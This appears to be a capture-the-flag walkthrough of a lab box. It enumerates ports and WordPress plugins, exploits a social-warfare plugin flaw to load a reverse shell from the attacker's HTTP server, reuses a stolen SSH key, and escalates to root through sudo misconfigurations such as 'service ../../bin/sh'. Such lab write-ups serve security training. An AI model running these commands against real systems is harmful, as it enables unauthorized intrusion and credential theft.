We start by scanning the host with “nmap -A -T4 -p- 192.168.1.11 -vv”:

Port 80 is open, so we scan it with “dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt”:

The box is running WordPress service, we can enumerate for plugins and see what we got:
wpscan –url http://192.168.1.18/wordpress -e ap

We got two plugins (simple-cart-solution) and (social-warfare), searching online for exploits i got this webpage for “social-soluion” vulnerability HERE and HERE:
Now we need to start a simple server on our machine to upload the shell to the target:
python -m SimpleHTTPServer 8080
What i did here is started the simple server and copied the exploit and put my IP address at the end of the command along with the shell file that i want to run “rshell.php”, then we head to http://192.168.1.18/wordpress/wp-admin/rshell.php
And start a listening port, you will get a shell back:


The fires file i opened is personal.txt it’s a base64 code and when we decode it:

We have .ssh folder where we can find id_rsa file:

Copy it, save it, and we can ssh with it:
chmod 600 keys.txt
ssh max@192.168.1.11 -i keys.txt


Max flag file
Now max can run “sudo -l”

sudo -u steven service ../../bin/sh

Steven flag file
Also, Steven can run “sudo -l”

But first the path /opt/tools/server-health.sh doesn’t exist, just creat it and inside the file server-health.sh just put:

Run it with sudo -u root /opt/tools/server-health.sh
And you root
Root flag file
